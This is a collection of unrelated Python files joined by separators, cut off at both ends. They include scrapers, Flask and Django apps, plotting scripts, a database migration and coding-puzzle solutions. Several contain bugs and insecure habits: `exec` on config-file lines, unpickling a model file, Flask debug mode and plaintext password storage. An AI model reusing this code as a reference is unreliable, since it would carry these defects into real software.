prod.find_element_by_xpath('/html/body/div[4]/div[1]/div[3]/div/div[2]/li[1]/div[10]')
except NoSuchElementException:
return False
return True
def get_products(self):
products = []
prods = self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'product-item')))
for prod in prods:
product = {"name": CatalogPage.hover(self, prod),
"image": prod.find_element_by_xpath(".//img").get_attribute("src"),
"price": int(CatalogPage.only_numerics(self, prod.find_element_by_class_name("price").text)),
"availability": CatalogPage.check_if_available(self, prod),
"link": prod.find_element_by_xpath(".//a").get_attribute("href"),
"shop": "hobbyworld"}
db_work.save_to_db(product)
products.append(product)
return products
def next_page(self):
next_page = self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'next-page')))
next_page.click()
time.sleep(3)
def check_next_page_exists(self):
try:
self.driver.find_element_by_class_name('next-page')
except NoSuchElementException:
return False
return True
def only_numerics(self, seq):
return filter(type(seq).isdigit, seq)
def get_top_games(self):
products = []
root = self.wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div[4]/div[1]/div[4]/div/div[1]/ul')))
prods = root.find_elements_by_xpath(".//li")
count = 0
for prod in prods:
if count == 4:
prod.find_element_by_xpath('/html/body/div[4]/div[1]/div[4]/div/div[3]').click()
time.sleep(1)
count = 0
product = {"name": CatalogPage.hover(self, prod),
"image": prod.find_element_by_xpath(".//img").get_attribute("src"),
"price": int(CatalogPage.only_numerics(self, prod.find_element_by_class_name("price").text)),
"link": prod.find_element_by_xpath(".//a").get_attribute("href"),
"shop": "hobbyworld"}
db_work.save_top(product)
products.append(product)
count += 1
return products
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
class queueUsingTwoStack:
def __init__(self):
#stack1 for enqueue and stack2 is for dequeue
self.stack1=[]
self.stack2=[]
def enqueue(self,item):
self.stack1.append(item)
#print(self.stack1)
def dequeue(self):
if not self.stack2:
while self.stack1:
self.stack2.append(self.stack1.pop())
self.stack2.pop()
def peek(self):
if self.stack2!=[]:
#we have to see the element not pop now
print(self.stack2[-1])
else:
#we have to see the element not pop now
print(self.stack1[0])
queue=queueUsingTwoStack()
for _ in range(int(input())):
val = list(map(int,input().split()))
if val[0] == 1:
queue.enqueue(val[1])
elif val[0] == 2:
queue.dequeue()
else:
queue.peek()
|
from django import forms
from .models import GENDER_CHOICES
GENDER_CHOICES = GENDER_CHOICES + [('', '---------')]
class ProfileSearchForm(forms.Form):
gender = forms.ChoiceField(label='Sex', choices=GENDER_CHOICES, required=False)
yearly_income = forms.IntegerField(label='saraly (above)', required=False)
height = forms.FloatField(label='Height (above)', required=False)
weight = forms.FloatField(label='Weight (below)', required=False)
ProfileSearchFormSet = forms.formset_factory(ProfileSearchForm, extra=3)
|
import time
import pygame
import config
import pprint
from src import backlight
from src import metoffer
from src import weather
from src import clock
from src import display
from threading import Timer,Thread,Event
weather = weather.Data( metoffer.MetOffer(config.metoffice_key) )
clock = clock.DateTime()
display = display.Display()
backlight = backlight.Backlight(config.backlight_delay)
class Tocker(Thread):
def __init__(self, event,clock):
Thread.__init__(self)
self.stopped = event
self.clock = clock
def run(self):
while not self.stopped.wait(0.5):
if(backlight.state == 'off'):
continue
display.tick()
if(clock.isNewMinute()):
display.updateMinute(clock.minute())
if(clock.isNewHour()):
display.updateHour(clock.hour())
display.updateDate(clock.day(),clock.fullDate())
try:
display.updateWeatherSummary(weather.daySummary())
display.updateWeatherForecast(weather.forecast(),clock.theTime())
display.displayActions()
except:
print('something up with metoffice')
display.update()
stopFlag = Event()
thread = Tocker(stopFlag,clock)
thread.start()
while True :
for event in pygame.event.get() :
# Quit
if event.type == pygame.QUIT :
quit()
if(event.type == pygame.MOUSEBUTTONDOWN and config.backlight_control):
state = backlight.toggle()
if(state == 'off'):
clock.reset()
|
"""proposal_contribution: add private, remove no_refund
Revision ID: 4505f00c4ebd
Revises: 0f08974b4118
Create Date: 2019-06-07 10:31:47.120185
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '4505f00c4ebd'
down_revision = '0f08974b4118'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('proposal_contribution', sa.Column('private', sa.Boolean(), server_default='true', nullable=False))
op.drop_column('proposal_contribution', 'no_refund')
# ### end Alembic commands ###
# existing contributions with user ids are public
op.execute("UPDATE proposal_contribution SET private = FALSE WHERE user_id IS NOT NULL")
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('proposal_contribution', sa.Column('no_refund', sa.BOOLEAN(), autoincrement=False, nullable=False))
op.drop_column('proposal_contribution', 'private')
# ### end Alembic commands ###
|
import cv2 as cv
import matplotlib.pyplot as plt
def read_image(img):
"""
Function responsible for read an image
:param img: Path to image
:return: Image read from the path
"""
return cv.imread(img)
def show_images(images: list, columns: int, rows: int):
"""
Function responsible for show images
:param images: How much images want to display
:param columns: How much columns in subplot
:param rows: How much rows in subplot
:return: Subplot with images
"""
fig = plt.figure(figsize=(4 * columns, 4 * rows))
for i in range(1, len(images) + 1):
fig.add_subplot(rows, columns, i)
plt.imshow(images[i - 1])
i += 1
plt.show()
|
import pickle
from flask import Flask, render_template, request
app = Flask(__name__)
# load the model from disk
filename = 'marriage_age_predict_model.pkl'
model = pickle.load(open(filename, 'rb'))
@app.route('/', methods=['GET'])
def Home():
return render_template('index.html')
@app.route("/predict", methods=['POST'])
def predict():
gender = int(request.args['gender'])
religion = int(request.args['religion'])
caste = int(request.args['caste'])
mother_tongue = int(request.args['mother_tongue'])
country = int(request.args['country'])
height_cms = int(request.args['height_cms'])
predicted_age = model.predict([gender, religion, caste, mother_tongue, country, height_cms, ])
print("checking ", str(round(predicted_age[0], 2)))
return str(round(predicted_age[0], 2))
if __name__ == "__main__":
app.run(port=2000, debug=True)
|
import pandas
import densityx
import Tkinter
import tkFileDialog
import sys
import os
def open_file_handler():
Tkinter.Tk().withdraw() # Close the root window
filePath = tkFileDialog.askopenfilename()
print filePath
return filePath
if __name__ == "__open_file_handler__":
open_file_handler()
def handle_file():
filePath = open_file_handler()
# handle the file
myfile = open_file_handler()
user_input_data = pandas.read_excel(myfile) #import excel file chosen by user
#use library to calculate density
densities = densityx.Density(user_input_data)
#Remane some columns for explicit output to excel spreadsheet
densities = densities.rename(columns = {'density':'Density(g/cm3)', 'density_unc':'Uncertainty(g/cm3)'})
#get 100% normalized composition, which is what is used for density calcs
normalized = densityx.NormalizeWtPercentVals(user_input_data)
#Make a sheet with only the important output data
index = densities["Sample_ID"]
columns = [densities["Sample_ID"], densities["Density(g/cm3)"], densities["Uncertainty(g/cm3)"]]
output = pandas.DataFrame(index, columns)
#Save this new data to an Excel spreadsheet
filename, file_extension = os.path.splitext(myfile)
writer = pandas.ExcelWriter(filename + '_output' + file_extension, engine='xlsxwriter') #Create a Pandas Excel writer using XlsxWriter as the engine.
output.to_excel(writer, sheet_name='Density Data')
normalized.to_excel(writer, sheet_name='Normalized Data')
writer.save() #Close the Pandas Excel writer and output the Excel file
print "Success!"
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################
# #
# acis_gain_plot_trend.py: plotting gain and offset trends #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last update: Sep 23, 2021 #
# #
#########################################################################
import os
import sys
import re
import string
import math
import operator
import numpy
import time
import Chandra.Time
import scipy
from scipy.optimize import curve_fit
import matplotlib as mpl
if __name__ == '__main__':
mpl.use('Agg')
from pylab import *
import matplotlib.pyplot as plt
import matplotlib.font_manager as font_manager
import matplotlib.lines as lines
#
#--- reading directory list
#
path = '/data/mta/Script/ACIS/Gain/house_keeping/dir_list_py'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- converTimeFormat contains MTA time conversion routines
#
import mta_common_functions as mcf
#
#--- temp writing file name
#
import random
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#
#--- set line color list
#
colorList = ('blue', 'green', 'red', 'aqua', 'lime', 'fuchsia', 'maroon', 'black', 'yellow', 'olive')
#-----------------------------------------------------------------------------------
#--- acis_gain_plot_trend: plotting trends of gain and offset --
#-----------------------------------------------------------------------------------
def acis_gain_plot_trend():
"""
plotting trends of gain and offset
Input: none, but read from <data_dir>
Output: <web_dir>/Plots/gain_plot_ccd<ccd>.png
<web_dir>/Plots/offset_plot_ccd<ccd>.png
"""
for ccd in range(0, 10):
#
#--- plotting 4 nodes on one panel, but gain and offset separately
#
Xset_gain = []
Yset_gain = []
Eset_gain = []
yMin_gain = []
yMax_gain = []
Label_gain = []
Xset_offset = []
Yset_offset = []
Eset_offset = []
yMin_offset = []
yMax_offset = []
Label_offset= []
for node in range(0, 4):
#
#--- read data for given CCD and Node #
#
ifile = data_dir + 'ccd' + str(ccd) + '_' + str(node)
data = mcf.read_data_file(ifile)
time = []
gain = []
gerr = [] #--- error for gain
offset = []
oerr = [] #--- error for offset
#
#--- setting lower and upper limits to remove outlyers
#
sum1 = 0.0
sum2 = 0.0
for ent in data:
atemp = re.split('\s+', ent)
gval = float(atemp[4])
sum1 += gval
sum2 += gval * gval
avg = sum1 / len(data)
sig = math.sqrt(sum2/len(data) - avg * avg)
blim = avg - 3.0 * sig;
tlim = avg + 3.0 * sig;
for ent in data:
atemp = re.split('\s+', ent)
#
#--- convert time into year date (e.g.2012.14)
#
gval = float(atemp[4])
if (gval <= blim) or (gval >= tlim):
continue
ytime = mcf.chandratime_to_fraq_year(float(atemp[0]))
time.append(ytime)
gain.append(float(atemp[4]))
gerr.append(float(atemp[5]))
offset.append(float(atemp[6]))
oerr.append(float(atemp[7]))
xmax = max(time)
Xset_gain.append(time)
Yset_gain.append(gain)
Eset_gain.append(gerr)
#
#--- set plotting range
#
avg = mean(gain)
ymin = avg - 0.005
ymin = round(ymin, 3) -0.001
ymax = avg + 0.005
ymax = round(ymax, 3) +0.001
yMin_gain.append(ymin)
yMax_gain.append(ymax)
name = 'Gain (ADU/eV) Node' + str(node)
Label_gain.append(name)
Xset_offset.append(time)
Yset_offset.append(offset)
Eset_offset.append(oerr)
avg = mean(offset)
ymin = avg - 30.0
ymin = int(ymin)
ymax = avg + 30.0
ymax = int(ymax)
yMin_offset.append(ymin)
yMax_offset.append(ymax)
name = 'Offset (ADU) Node' + str(node)
Label_offset.append(name)
xmin = int(2000)
xtmp = xmax
xmax = int(xmax) + 1
#
#--- if the year is already passed a mid point, add another year
#
if (xtmp - xmax) > 0.5:
xmax += 1
xname = 'Time (year)'
#
#--- actual plotting starts here
#
yname = 'Gain'
outname = web_dir + "/Plots/gain_plot_ccd" + str(ccd) + '.png'
plotPanel(xmin, xmax, yMin_gain, yMax_gain, Xset_gain, Yset_gain, \
Eset_gain, xname, yname, Label_gain, outname)
yname = 'Offset'
outname = web_dir + "/Plots/offset_plot_ccd" + str(ccd) + '.png'
plotPanel(xmin, xmax, yMin_offset, yMax_offset, Xset_offset, Yset_offset,\
Eset_offset, xname, yname, Label_offset, outname)
#-----------------------------------------------------------------------------------
#--- plotPanel: plots multiple data in separate panels ---
#-----------------------------------------------------------------------------------
def plotPanel(xmin, xmax, yMinSets, yMaxSets, xSets, ySets, eSets, xname, yname, entLabels, outname):
"""
This function plots multiple data in separate panels
Input: xmin --- x min
xmax --- x max
ymin --- y min
ynax --- ymax
xSets --- a list of lists containing x-axis data
ySets --- a list of lists containing y-axis data
yMinSets --- a list of ymin
yMaxSets --- a list of ymax
xname --- x label
yname --- y label
entLabels --- a list of the names of each data
outname --- the output file name
Output: outname --- a png plot
"""
#
#--- clean up the plotting device
#
plt.close('all')
#
#---- set a few parameters
#
mpl.rcParams['font.size'] = 9
props = font_manager.FontProperties(size=9)
plt.subplots_adjust(hspace=0.08)
tot = len(entLabels)
#
#--- start plotting each data
#
for i in range(0, len(entLabels)):
axNam = 'ax' + str(i)
#
#--- setting the panel position
#
j = i + 1
if i == 0:
line = str(tot) + '1' + str(j)
else:
line = str(tot) + '1' + str(j) + ', sharex=ax0'
line = str(tot) + '1' + str(j)
exec("%s = plt.subplot(%s)" % (axNam, line))
exec("%s.set_autoscale_on(False)" % (axNam)) #---- these three may not be needed for the new pylab, but
exec("%s.set_xbound(xmin,xmax)" % (axNam)) #---- they are necessary for the older version to set
exec("%s.set_xlim(xmin=xmin, xmax=xmax, auto=False)" % (axNam))
exec("%s.set_ylim(ymin=yMinSets[i], ymax=yMaxSets[i], auto=False)" % (axNam))
xdata = numpy.array(xSets[i])
ydata = numpy.array(ySets[i])
edata = numpy.array(eSets[i])
elen = len(edata)
pdata = numpy.ones(elen)
#
#--- fitting weighted least sq. line
#
popt, pcov = curve_fit(model, xdata, ydata, p0=(0, 1))
[intc, slope] = list(popt)
[ierr, serr] = list(numpy.sqrt(numpy.diag(pcov)))
ystart = intc + slope * xmin
ystop = intc + slope * xmax
lxdata = [xmin, xmax]
lydata = [ystart, ystop]
#
#---- actual data plotting
#
p, = plt.plot(xdata, ydata, color=colorList[i], marker='.', markersize=4.0, lw =0)
p, = plt.plot(lxdata, lydata, color=colorList[i], marker='', markersize=1.0, lw =1)
plt.errorbar(xdata, ydata, yerr=edata, ecolor=colorList[i], markersize=0.0, fmt='ro')
#
#--- add legend
#
if slope < 0.01:
pslope = slope * 1.0e4
pslope = round(pslope, 3)
pserr = serr * 1.0e4
pserr = round(pserr, 3)
eline = '(' + str(pslope) + '+/-' + str(pserr) + ')e-04'
legend_line = entLabels[i] + ' Slope: ' + eline
else:
legend_line = entLabels[i] + ' Slope: ' + str(round(slope, 3)) + '+/-' + str(round(serr, 3))
leg = legend([p], [legend_line], prop=props, loc=2)
leg.get_frame().set_alpha(0.5)
exec("%s.set_ylabel(yname, size=8)" % (axNam))
#
#--- add x ticks label only on the last panel
#
for i in range(0, tot):
ax = 'ax' + str(i)
if i != tot-1:
line = eval("%s.get_xticklabels()" % (ax))
for label in line:
label.set_visible(False)
else:
pass
xlabel(xname)
#
#--- set the size of the plotting area in inch (width: 10.0in, height 2.08in x number of panels)
#
fig = matplotlib.pyplot.gcf()
height = (2.00 + 0.08) * tot
fig.set_size_inches(10.0, height)
#
#--- save the plot in png format
#
plt.savefig(outname, format='png', dpi=200)
#--------------------------------------------------------------------------------------------------
#-- model: model for least sq. fitting ---
#--------------------------------------------------------------------------------------------------
def model(x, a, b):
"""
model for least sq. fitting
Input: p (a, b) --- intercept and slope of the line
x --- independent variable value
Output: estimated y value
"""
return a + b*x
#--------------------------------------------------------------------------------------------------
#-- residuals: compute residuals ---
#--------------------------------------------------------------------------------------------------
def residuals(p, my_arrays):
"""
compute residuals
my_arrays --- (x, y, err): they are numpy array
p --- (a, b): intercept and slope
Output: numpy array of residuals
"""
x, y, err = my_arrays
a, b = p
return (y-model(p,x))/err
#--------------------------------------------------------------------
#
#--- pylab plotting routine related modules
#
if __name__ == '__main__':
acis_gain_plot_trend()
|
#!/usr/bin/env python2
import requests
import re
import json
class FailedRequest(Exception): pass
def get_results(user):
r = requests.get('https://www.root-me.org/%s' % user, params={'inc': 'score', 'lang': 'fr'})
if r.status_code != 200: raise FailedRequest(r)
return r.content
def get_status(user):
content = get_results(user)
m = re.search(r'(\d+) Points ', content)
assert(m)
score = int(m.group(1))
problems = []
for m in re.findall(r'\<a class=" (vert|rouge)".*?(x|o) (.*?)<', content):
(color, status, problem) = m
STATUSES = {
'x': False,
'o': True,
}
assert(status in STATUSES)
problems.append((problem, STATUSES[status]))
return (score, problems)
if __name__ == '__main__':
from argparse import ArgumentParser
import sys
users_cfg = None
parser = ArgumentParser('Fetch root-me.org results for the given set of pseudos.')
parser.add_argument('--users', help='JSON file where to read pseudos', required=True)
parser.add_argument('--result', help='JSON file where to write results', default='-')
options = parser.parse_args()
assert('users' in options and 'result' in options)
with open(options.users, 'rb') as f:
pseudos = json.load(f)
users = {}
for pseudo in pseudos:
try:
(score, problems) = get_status(pseudo)
users[pseudo] = {'score': score, 'problems': problems}
except:
users[pseudo] = {'score': 0, 'problems': []}
if options.result == '-':
f = sys.stdout
else:
f = open(options.result, 'wb')
json.dump(users, f)
|
import polars as pl
def test_date_datetime() -> None:
df = pl.DataFrame(
{
"year": [2001, 2002, 2003],
"month": [1, 2, 3],
"day": [1, 2, 3],
"hour": [23, 12, 8],
}
)
out = df.select(
[
pl.all(), # type: ignore
pl.datetime("year", "month", "day", "hour").dt.hour().alias("h2"), # type: ignore
pl.date("year", "month", "day").dt.day().alias("date"), # type: ignore
]
)
assert out["date"].series_equal(df["day"])
assert out["h2"].series_equal(df["hour"])
|
"""
refer to src/1282.cpp
"""
class Solution:
# Runtime: 72 ms, faster than 95.14%
# Memory Usage: 12.8 MB, less than 100.00%
def groupThePeople(self, groupSizes: List[int]) -> List[List[int]]:
d = {}
for idx, v in enumerate(groupSizes):
if v not in d:
d[v] = [idx]
else:
d[v].append(idx)
ret = []
for k, vals in d.items():
for i in range(len(vals) // k):
ret.append(vals[i * k : (i + 1) * k])
return ret
# Runtime: 228 ms, faster than 5.69%
# Memory Usage: 12.8 MB, less than 100.00%
def groupThePeople_1(self, groupSizes: List[int]) -> List[List[int]]:
n = len(groupSizes)
ret = [] # to record all groups
ret_limit = [] # to record limitation of groups
succ = False; # to mark if successful in inserting
for i in range(n):
s = groupSizes[i]
length = len(ret)
succ = False
# insert current person into existing group
for j in range(length):
limit = ret_limit[j]
# valid group
if s == limit and limit > len(ret[j]):
ret[j].append(i)
succ = True
break
# create a new group
if not succ:
ret_limit.append(s)
ret.append([i])
return ret
|
import os
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
from models import db, User, Planets, Characters, Vehicles, Favorite
from flask_migrate import Migrate
#from flask_script import Manager
BASEDIR = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///" + os.path.join(BASEDIR, "test.db")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['ENV'] = 'development'
app.config['DEBUG'] = True
#manager = Manager(app)
Migrate(app, db)
db.init_app(app)
@app.route('/')
def home():
return jsonify('Creando Star Wars API')
@app.route("/user", methods=["POST", "GET"])
def user():
if request.method == "GET":
user = User.query.all()
user = list(map(lambda user: user.serialize(), user))
if user is not None:
return jsonify(user)
else:
user = User()
user.user_name = request.json.get("user_name")
user.first_name = request.json.get("first_name")
user.last_name = request.json.get("last_name")
user.password = request.json.get("password")
user.email = request.json.get("email")
db.session.add(user)
db.session.commit()
return jsonify(user.serialize()), 200
@app.route("/favorite/user/<int:user_id>", methods=["GET","POST"])
def userFav(user_id):
if request.method == "GET":
if user_id is not None:
favorites = Favorite.query.filter_by(user_id=user_id)
favorites = list(map(lambda favorite: favorite.serialize(), favorites))
return jsonify(favorites), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_planet_id = request.json.get("fav_planet_id")
favorite.fav_character_id = request.json.get("fav_character_id")
favorite.fav_vehicle_id = request.json.get("fav_vehicle_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/user/favorite", methods=["POST", "GET"])
def favorite():
if request.method == "GET":
favorite = Favorite.query.get(3)
if favorite is not None:
return jsonify(favorite.serialize())
else:
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_planet_id = request.json.get("fav_planet_id")
favorite.fav_character_id = request.json.get("fav_character_id")
favorite.fav_vehicle_id = request.json.get("fav_vehicle_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/planets/<int:planet_id>", methods=["POST"])
def addplanetid(planet_id):
if request.method == "POST":
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_planet_id = request.json.get("planet_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/characters/<int:character_id>", methods=["POST"])
def addcharacterid(character_id):
if request.method == "POST":
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_character_id = request.json.get("character_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/vehicles/<int:vehicle_id>", methods=["POST"])
def addvehicleid(vehicle_id):
if request.method == "POST":
favorite = Favorite()
favorite.user_id = request.json.get("user_id")
favorite.fav_vehicle_id = request.json.get("vehicle_id")
db.session.add(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/vehicles/<int:vehicle_id>", methods=["DELETE"])
def deletevehicleid(vehicle_id):
if request.method == "DELETE":
favorite = Favorite.query.get(vehicle_id)
db.session.delete(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/characters/<int:character_id>", methods=["DELETE"])
def deletecharacters(character_id):
if request.method == "DELETE":
favorite = Favorite.query.all()
favorite.fav_character_id = request.json.get("character_id")
favorite.user_id = request.json.get("user_id")
db.session.delete(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/favorite/planets/<int:planet_id>", methods=["DELETE"])
def deleteplanets(planet_id):
if request.method == "DELETE":
favorite = Favorite.query.filter_by(user_id = 1).first()
favorite.fav_planet_id = request.json.get("planet_id")
db.session.delete(favorite)
db.session.commit()
return jsonify(favorite.serialize()), 200
@app.route("/planets", methods=["POST", "GET"])
def planets():
if request.method == "GET":
planets = Planets.query.all()
planets = list(map(lambda planets: planets.serialize(), planets))
if planets is not None:
return jsonify(planets)
else:
planets = Planets()
planets.name = request.json.get("name")
planets.climate = request.json.get("climate")
planets.terrain = request.json.get("terrain")
planets.population = request.json.get("population")
planets.diameter = request.json.get("diameter")
planets.rotation_period = request.json.get("rotation_period")
planets.orbital_period = request.json.get("orbital_period")
planets.surface_water = request.json.get("surface_water")
planets.residents = request.json.get("residents")
db.session.add(planets)
db.session.commit()
return jsonify(planets.serialize()), 200
@app.route("/addplanets", methods=["POST"])
def addplanets():
planets_list = request.json.get("planets_list")
for planets in planets_list:
new_planets = Planets()
new_planets.name= planets["name"]
new_planets.climate = planets["climate"]
new_planets.terrain = planets["terrain"]
new_planets.population = planets["population"]
new_planets.diameter = planets["diameter"]
new_planets.rotation_period = planets["rotation_period"]
new_planets.orbital_period = planets["orbital_period"]
new_planets.surface_water = planets["surface_water"]
new_planets.residents = planets["residents"]
db.session.add(new_planets)
db.session.commit()
return jsonify("Done"), 200
@app.route("/planets/<int:planet_id>", methods=["GET","POST"])
def planet(planet_id):
if request.method == "GET":
if planet_id is not None:
planets = Planets.query.get(planet_id)
return jsonify(planets.serialize()), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
planets = Planets()
planets.name = request.json.get("name")
planets.climate = request.json.get("climate")
planets.terrain = request.json.get("terrain")
planets.population = request.json.get("population")
planets.diameter = request.json.get("diameter")
planets.rotation_period = request.json.get("rotation_period")
planets.orbital_period = request.json.get("orbital_period")
planets.surface_water = request.json.get("surface_water")
planets.residents = request.json.get("residents")
db.session.add(planets)
db.session.commit()
return jsonify(planets.serialize()), 200
@app.route("/characters", methods=["POST", "GET"])
def characters():
if request.method == "GET":
characters = Characters.query.all()
characters = list(map(lambda characters: characters.serialize(), characters))
if planets is not None:
return jsonify(characters)
else:
characters = Characters()
characters.name = request.json.get("name")
characters.height = request.json.get("height")
characters.mass = request.json.get("mass")
characters.hair_color = request.json.get("hair_color")
characters.skin_color = request.json.get("skin_color")
characters.eye_color = request.json.get("eye_color")
characters.birth_year = request.json.get("birth_year")
characters.gender = request.json.get("gender")
characters.homeworld = request.json.get("homeworld")
#characters.vehicles = request.json.get("vehicles")
db.session.add(characters)
db.session.commit()
return jsonify(characters.serialize()), 200
@app.route("/characters/<int:character_id>", methods=["GET","POST"])
def character(character_id):
if request.method == "GET":
if character_id is not None:
characters = Characters.query.get(character_id)
return jsonify(characters.serialize()), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
characters = Characters()
characters.name = request.json.get("name")
characters.height = request.json.get("height")
characters.mass = request.json.get("mass")
characters.hair_color = request.json.get("hair_color")
characters.skin_color = request.json.get("skin_color")
characters.eye_color = request.json.get("eye_color")
characters.birth_year = request.json.get("birth_year")
characters.gender = request.json.get("gender")
characters.homeworld = request.json.get("homeworld")
#characters.vehicles = request.json.get("vehicles")
db.session.add(characters)
db.session.commit()
return jsonify(characters.serialize()), 200
@app.route("/vehicles", methods=["POST", "GET"])
def vehicles():
if request.method == "GET":
vehicles = Vehicles.query.all()
vehicles = list(map(lambda vehicles: vehicles.serialize(), vehicles))
if vehicles is not None:
return jsonify(vehicles)
else:
vehicles = Vehicles()
vehicles.name = request.json.get("name")
vehicles.model = request.json.get("model")
vehicles.manufacturer = request.json.get("manufacturer")
vehicles.cost_in_credits = request.json.get("cost_in_credits")
vehicles.crew = request.json.get("crew")
vehicles.passengers = request.json.get("passengers")
vehicles.cargo_capacity = request.json.get("cargo_capacity")
vehicles.vehicle_class = request.json.get("vehicle_class")
vehicles.pilots = request.json.get("pilots")
db.session.add(vehicles)
db.session.commit()
return jsonify(vehicles.serialize()), 200
@app.route("/addvehicles", methods=["POST"])
def addvehicles():
vehicles_list = request.json.get("vehicles_list")
for vehicles in vehicles_list:
new_vehicles = Vehicles()
new_vehicles.name= vehicles["name"]
new_vehicles.model = vehicles["model"]
new_vehicles.manufacturer = vehicles["manufacturer"]
new_vehicles.cost_in_credits = vehicles["cost_in_credits"]
new_vehicles.crew = vehicles["crew"]
new_vehicles.passengers = vehicles["passengers"]
new_vehicles.cargo_capacity = vehicles["cargo_capacity"]
new_vehicles.vehicle_class = vehicles["vehicle_class"]
#new_vehicles.pilots = vehicles["pilots"]
db.session.add(new_vehicles)
db.session.commit()
return jsonify("Done"), 200
@app.route("/vehicles/<int:vehicle_id>", methods=["GET","POST"])
def vehicle(vehicle_id):
if request.method == "GET":
if vehicle_id is not None:
vehicles = Vehicles.query.get(vehicle_id)
return jsonify(vehicles.serialize()), 200
else:
return jsonify('Missing id parameter in route'), 404
else:
vehicles = Vehicles()
vehicles.name = request.json.get("name")
vehicles.model = request.json.get("model")
vehicles.manufacturer = request.json.get("manufacturer")
vehicles.cost_in_credits = request.json.get("cost_in_credits")
vehicles.crew = request.json.get("crew")
vehicles.passengers = request.json.get("passengers")
vehicles.cargo_capacity = request.json.get("cargo_capacity")
vehicles.vehicle_class = request.json.get("vehicle_class")
vehicles.pilots = request.json.get("pilots")
db.session.add(vehicles)
db.session.commit()
return jsonify(vehicles.serialize()), 200
if __name__ == "__main__":
app.run(host='localhost', port=8080)
|
# import json library for json file loading and dumping
import json
# Import custom errors, IO logger, and client models
from .ClientDAO import ClientDAO
from .Client import Client, requires_client
from error.Error import ClientSetupError
from logger.Logger import Logger
log = Logger(__name__)
class ClientDAOJSON(ClientDAO):
"""
JSON access object
"""
def __init__(self, vault_file):
"""
vault_file : path to json vault file
"""
self.vault_file = vault_file
log_prefix = "instantiated ClientDAO for json file at: "
log.log_debug(log_prefix + vault_file)
def get_clients(self):
"""
returns a list of clients in the vault
"""
# Securely load client dictionaries from json vault file
with open(self.vault_file, 'r') as f:
client_dicts = json.load(f)
# Create list of clients from client dictionaries
clients = []
for dict in client_dicts:
new_client = Client()
new_client.__dict__ = dict
clients.append(new_client)
log.log_debug("pulled list of Clients: " + str(clients))
return clients
@requires_client
def add_client(self, new_client):
"""
adds a client to the vault unless that client is already in the vault
clients are uniquely identified by username so even if two clients with
the same username have different passwords they are still considered
the same
can raise a ClientSetupError if a client with the same username already
exists
"""
# get a list of clients
clients = self.get_clients()
# check if the client is already in the vault before adding
if new_client in clients:
log.log_error("ClientSetupError: Client with same username already exists")
raise ClientSetupError('Client with same username already exists')
else:
clients.append(new_client)
# write the updated vault list to the vault
client_dicts = [client.__dict__ for client in clients]
with open(self.vault_file, 'w') as f:
json.dump(client_dicts, f, indent=4)
log.log_debug("added {0} to {1}".format(str(new_client), str(clients)))
@requires_client
def update_client(self, client):
"""
changes a client in the vault unless a client with the same username as
new_client already exists
always deletes old client
clients are uniquely identified by username so even if two clients with
the same username have different passwords they are still considered
the same
"""
# get a list of clients
clients = self.get_clients()
# remove old client
clients.remove(client)
# append updated client
clients.append(client)
# write the updated vault list to the vault
client_dicts = [client.__dict__ for client in clients]
with open(self.vault_file, 'w') as f:
json.dump(client_dicts, f, indent=4)
log.log_debug("updated {0}".format(str(client)))
@requires_client
def delete_client(self, client):
"""
deletes client from vault
clients are uniquely identified by username so even if two clients with
the same username have different passwords they are still considered
the same
"""
# get a list of clients
clients = self.get_clients()
# remove client
clients.remove(client)
# write the updated vault list to the vault
client_dicts = [client.__dict__ for client in clients]
with open(self.vault_file, 'w') as f:
json.dump(client_dicts, f, indent=4)
log.log_debug("deleted {0}".format(str(client)))
def clear_clients(self):
"""
clear vault contents
"""
# Write a blank list to the vault
cleared_vault = []
with open(self.vault_file, 'w') as f:
json.dump(cleared_vault, f, indent=4)
log.log_debug("cleared vault")
|
# Python Imports
import traceback
from threading import Thread
from datetime import datetime
import socket
from collections import *
# Local Imports
import globals
import yamaha
def setup_ip(self):
"""
If auto detect ip is enabled, this function will attempt to configure the ip
address, otherwise if static ip is enabled, this function will
verify whether a yamaha receiver can be found at the given static ip.
"""
if self.ip_auto_detect:
print "Searching for Yamaha Recievers ({0})...".format(self.auto_detect_model)
ip = auto_detect_ip_threaded(self)
if ip is not None:
self.ip_address = ip
return ip
else:
try:
model = yamaha.get_config_string(self, 'Model_Name', timeout=self.auto_detect_timeout, ip=self.ip_address, print_error=False)
print "Found Yamaha Receiver: {0} [{1}]".format(self.ip_address, model)
